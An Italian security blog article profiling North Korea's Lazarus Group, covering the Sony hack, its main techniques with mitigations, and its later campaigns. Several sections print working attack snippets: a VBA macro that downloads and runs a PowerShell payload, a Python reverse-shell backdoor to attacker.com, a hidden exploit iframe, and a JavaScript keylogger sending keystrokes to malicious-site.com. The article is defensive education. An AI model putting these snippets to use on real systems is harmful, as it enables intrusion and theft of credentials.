Minacce

Lazarus Group: la minaccia cyber della Corea del Nord 

Il Lazarus Group, APT della Corea del Nord, ha colpito banche, media e governi globali. Scopri i loro attacchi e le tecniche di hacking avanzate.

Grandi attacchi informatici in tutto il mondo

16 Aprile 2025

Indice dei contenuti

  • Chi è il Gruppo Lazarus? 
  • L’attacco a Sony Pictures: un punto di svolta
  • Come attacca il Lazarus APT Group
  • Oltre Sony: Gli altri attacchi globali del Lazarus Group
  • Lazarus Group e le minacce ai dispositivi mobili 
  • Come difendersi dal Gruppo Lazarus 

Il Gruppo APT Lazarus è uno dei più temuti threat actor nel mondo della cyber security. Si ritiene che sia legato alla Corea del Nord e che abbia orchestrato alcuni degli attacchi informatici più devastanti della storia, tra cui il famigerato attacco del 2014 a Sony Pictures Entertainment.

Le loro operazioni prendono di mira istituzioni finanziarie, exchange di criptovalute e persino agenzie governative, utilizzando tecniche avanzate di hacking e sofisticati malware. 

In questo articolo esploreremo chi è il Gruppo Lazarus, i loro attacchi più noti e le strategie per difendersi dalle loro minacce. 

Chi è il Gruppo Lazarus? 

Il Lazarus Group è un’organizzazione di cyber criminali che si ritiene abbia legami con il governo della Corea del Nord. Attivo almeno dal 2009, questo gruppo APT ha colpito istituzioni finanziarie, aziende mediatiche e persino infrastrutture nazionali in diversi paesi. 

Secondo esperti di cyber security, Lazarus utilizza attacchi informatici per raccogliere fondi destinati al regime di Pyongyang, aggirando così le sanzioni internazionali. I loro metodi includono il furto da exchange di criptovalute, l’hacking delle banche e attività di spionaggio digitale. 

La loro esistenza è stata ampiamente documentata grazie all’Operazione Blockbuster, un’indagine internazionale che ha rivelato una rete di attacchi in 14 nazioni, tra cui gli Stati Uniti, la Corea del Sud e l’India

L’attacco a Sony Pictures: un punto di svolta 

Uno degli attacchi più celebri attribuiti al Gruppo Lazarus è stato l’hack ai danni di Sony Pictures Entertainment nel novembre 2014. Gli hacker riuscirono a infiltrarsi nei server della società, rubando 2 terabyte di dati sensibili, tra cui email, contratti, stipendi e persino film non ancora usciti. 

L’attacco fu interpretato come una ritorsione per il film The Interview, una commedia satirica che prendeva in giro Kim Jong-un. L’FBI identificò rapidamente il malware utilizzato e trovò somiglianze con attacchi precedenti legati alla Corea del Nord, confermando che l’operazione era stata orchestrata dal Lazarus Group

L’episodio ha avuto conseguenze devastanti per Sony, spingendo le aziende di tutto il mondo a rivedere le proprie strategie di sicurezza informatica

Come attacca il Lazarus APT Group

Il Gruppo APT Lazarus utilizza una combinazione di ingegneria sociale, vulnerabilità software e tecniche avanzate di attacco per infiltrarsi nei sistemi informatici. I loro attacchi mirano spesso a istituzioni finanziarie, exchange di criptovalute, infrastrutture critiche e aziende tecnologiche

Vediamo nel dettaglio alcune delle principali tecniche usate dal Lazarus Group, con esempi pratici e codice laddove applicabile. 

Spear phishing: l’inganno via email 

Il Lazarus APT Group utilizza frequentemente attacchi di spear phishing, inviando email mirate a dipendenti specifici con l’obiettivo di rubare credenziali o distribuire malware. 

Esempio di attacco
Un dipendente riceve un’email apparentemente legittima da un collega o da un fornitore affidabile. L’email contiene un allegato o un link a un documento online che, una volta aperto, esegue codice dannoso sul computer della vittima. 

Codice esempio: esecuzione di un macro malware in un documento word 

Lazarus spesso utilizza documenti Office con macro dannose per eseguire codice malevolo. Ecco un esempio di una macro VBA che scarica ed esegue un payload da un server remoto: 

vba 

Sub AutoOpen() 

    Dim objShell As Object 

    Set objShell = CreateObject("WScript.Shell") 

    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')""" 

End Sub

Questa macro viene eseguita automaticamente all’apertura del documento e scarica un payload PowerShell da un server remoto, consentendo agli hacker di ottenere il controllo del sistema. 

Mitigazione 

  • Bloccare le macro non firmate nei documenti ricevuti via email. 
  • Implementare autenticazione a due fattori (2FA) per ridurre il rischio di compromissione dell’account. 
  • Utilizzare sistemi di sandboxing per analizzare email sospette prima della consegna ai destinatari. 

Zero-day exploit: sfruttamento di vulnerabilità sconosciute 

Il Lazarus Group è noto per sfruttare vulnerabilità zero-day, ossia falle di sicurezza sconosciute ai produttori di software. 

Esempio di attacco
Nel 2021, il gruppo ha sfruttato una vulnerabilità zero-day in Internet Explorer (CVE-2021-26411) per compromettere utenti che visitavano siti web infetti. 

Codice esempio: exploit in JavaScript per attacchi web 

Gli attaccanti possono inserire codice malevolo in siti web legittimi o infetti per eseguire un exploit che compromette il browser della vittima: 

javascript 

window.onload = function() { 

    var iframe = document.createElement('iframe'); 

    iframe.src = "http://malicious-site.com/exploit.html"; 

    iframe.style.display = "none"; 

    document.body.appendChild(iframe); 

};

Una volta che la vittima visita il sito, l’iframe nascosto carica un exploit che esegue codice arbitrario nel browser. 

Mitigazione 

  • Mantenere sempre aggiornati browser e sistemi operativi
  • Utilizzare software di protezione avanzata che rileva e blocca exploit sconosciuti. 
  • Isolare ambienti ad alto rischio con sandbox e macchine virtuali. 

Malware personalizzato: trojan e backdoor 

Il Lazarus Group sviluppa e distribuisce malware su misura per rubare informazioni sensibili e mantenere accesso persistente alle reti compromesse. 

Esempio di attacco
Nel 2017, il malware FALLCHILL, attribuito a Lazarus, è stato utilizzato per ottenere l’accesso remoto a reti aziendali. Una volta installato, il malware permetteva agli attaccanti di eseguire comandi da remoto e trasferire file. 

Codice esempio: backdoor in python 

Ecco un semplice esempio di backdoor python che può essere utilizzata per stabilire una connessione remota con un server controllato dagli hacker: 

python 

import socket 

import subprocess 

HOST = "attacker.com" 

PORT = 4444 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

s.connect((HOST, PORT)) 

while True: 

    command = s.recv(1024).decode() 

    if command.lower() == "exit": 

        break 

    output = subprocess.getoutput(command) 

    s.send(output.encode()) 

s.close()

Questa backdoor consente agli attaccanti di eseguire comandi sul sistema compromesso, ricevendo i risultati in tempo reale. 

Mitigazione 

  • Utilizzare firewall e sistemi di rilevamento delle intrusioni (IDS/IPS) per bloccare connessioni sospette. 
  • Monitorare il traffico di rete per identificare comunicazioni anomale con server esterni. 
  • Analizzare i processi in esecuzione per individuare attività sospette. 

Attacchi watering hole: infettare siti frequentati dalle vittime 

Gli attacchi watering hole consistono nell’infettare siti web che vengono spesso visitati dalle vittime per diffondere malware. 

Esempio di attacco
Nel 2019, Lazarus ha compromesso siti web legati al settore della difesa per infettare i dispositivi di dipendenti governativi. 

Codice esempio: iniezione di script maligno in una pagina web 

Gli attaccanti possono modificare siti web legittimi per includere codice che reindirizza le vittime a una pagina malevola: 

html 

<script src="http://malicious-site.com/malware.js"></script> 

Oppure possono sfruttare attacchi più avanzati per raccogliere credenziali di accesso tramite keylogger in JavaScript: 

javascript 

document.addEventListener('keydown', function(event) { 

    fetch('http://malicious-site.com/steal', { 

        method: 'POST', 

        body: JSON.stringify({ key: event.key }) 

    }); 

});

Mitigazione 

  • Utilizzare estensioni del browser come NoScript per bloccare JavaScript sospetto. 
  • Monitorare il traffico DNS per individuare connessioni a domini malevoli. 
  • Evitare di inserire credenziali in siti web sospetti

Attacchi ai dispositivi personali e BYOD 

Il Lazarus Group prende di mira smartphone e laptop personali utilizzati per scopi lavorativi, soprattutto se l’azienda adotta politiche BYOD senza adeguati sistemi di sicurezza. 

Esempio di attacco
Un dipendente scarica un’app falsa da uno store non ufficiale. L’app contiene malware che ruba dati aziendali, come email e credenziali di accesso ai sistemi interni. 

Mitigazione 

  • Implementare soluzioni MDM (Mobile Device Management) per controllare l’accesso ai dati aziendali. 
  • Evitare il download di app da fonti non verificate
  • Impostare VPN aziendali per garantire connessioni sicure ai server aziendali. 
Attacchi informatici globali

Oltre Sony: Gli altri attacchi globali del Lazarus Group 

Il Gruppo Lazarus non si è fermato all’attacco a Sony Pictures. Negli anni ha orchestrato numerose offensive su scala globale, tra cui: 

  • Attacchi DarkSeoul (2013)
    Presi di mira i media e il settore bancario della Corea del Sud
  • Furto alla Banca del Bangladesh (2016)
    Sottratti 81 milioni di dollari attraverso il sistema di pagamento SWIFT. 
  • Attacco ransomware WannaCry (2017)
    Virus che ha colpito ospedali, aziende e governi in tutto il mondo. 
  • Furti di criptovalute (2020-presente)
    Hackeraggio di exchange di criptovalute per sottrarre milioni in Bitcoin ed Ethereum. 

Questi attacchi dimostrano la capacità del Lazarus Group di adattarsi alle nuove tecnologie e superare le difese informatiche tradizionali

Lazarus Group e le minacce ai dispositivi mobili 

Con la diffusione delle politiche BYOD, è essenziale capire come i dispositivi personali possano essere vulnerabili agli attacchi del Lazarus Group. Gli hacker sfruttano metodi come: 

  • App infette che rubano dati aziendali
  • Link di phishing che compromettono i telefoni. 
  • Exploit contro soluzioni di gestione dei dispositivi mobili (MDM) poco sicure. 

Le aziende devono implementare soluzioni MDM avanzate per proteggere i dispositivi e impedire accessi non autorizzati. 

Come difendersi dal Gruppo Lazarus 

Nonostante la loro sofisticazione, è possibile mitigare i rischi adottando strategie di sicurezza adeguate: 

  • Monitoraggio avanzato per rilevare attività sospette in rete. 
  • Formazione del personale per evitare truffe di phishing. 
  • Autenticazione a più fattori per proteggere gli account aziendali. 
  • Protezione dei dispositivi mobili con soluzioni MDM e crittografia. 

Le minacce informatiche della Corea del Nord continueranno a evolversi, rendendo essenziale l’adozione di misure di sicurezza efficaci. 

Conclusione 

Il Gruppo Lazarus rappresenta una delle minacce cyber più pericolose al mondo. Dai furti alle banche agli attacchi ransomware, le loro operazioni hanno avuto impatti devastanti su aziende e governi. 

Comprendere le loro tattiche è fondamentale per migliorare le difese informatiche e proteggere dati e infrastrutture da questi attori malevoli

Domande e risposte

  1. Chi è il Gruppo Lazarus? 
    Il Lazarus Group è un’organizzazione di cyber criminali legata alla Corea del Nord, responsabile di attacchi informatici globali. 
  2. Cos’è l’Operazione Blockbuster? 
    È un’indagine che ha rivelato i collegamenti tra vari attacchi informatici, dimostrando il coinvolgimento del Gruppo Lazarus. 
  3. Perché il Lazarus Group ha attaccato Sony Pictures? 
    Per vendicarsi del film The Interview, che prendeva in giro Kim Jong-un. L’attacco ha causato una fuga di dati devastante. 
  4. Quali sono i principali obiettivi del Lazarus Group? 
    Banche, exchange di criptovalute, aziende tecnologiche e governi. 
  5. Come rubano criptovalute? 
    Attraverso malware, phishing e attacchi agli exchange di criptovalute. 
  6. Lazarus è collegato a WannaCry? 
    Sì, il ransomware WannaCry del 2017 è stato attribuito a loro. 
  7. Come sfruttano il BYOD? 
    Attaccano dispositivi personali non protetti per entrare nelle reti aziendali. 
  8. Possono attaccare utenti comuni? 
    Sì, con truffe, malware e furti di credenziali. 
  9. Come difendersi? 
    Usando autenticazione a più fattori, protezione mobile e formazione contro le minacce. 
  10. Il Lazarus Group è ancora attivo? 
    Sì, continua a lanciare attacchi in tutto il mondo. 
2
To top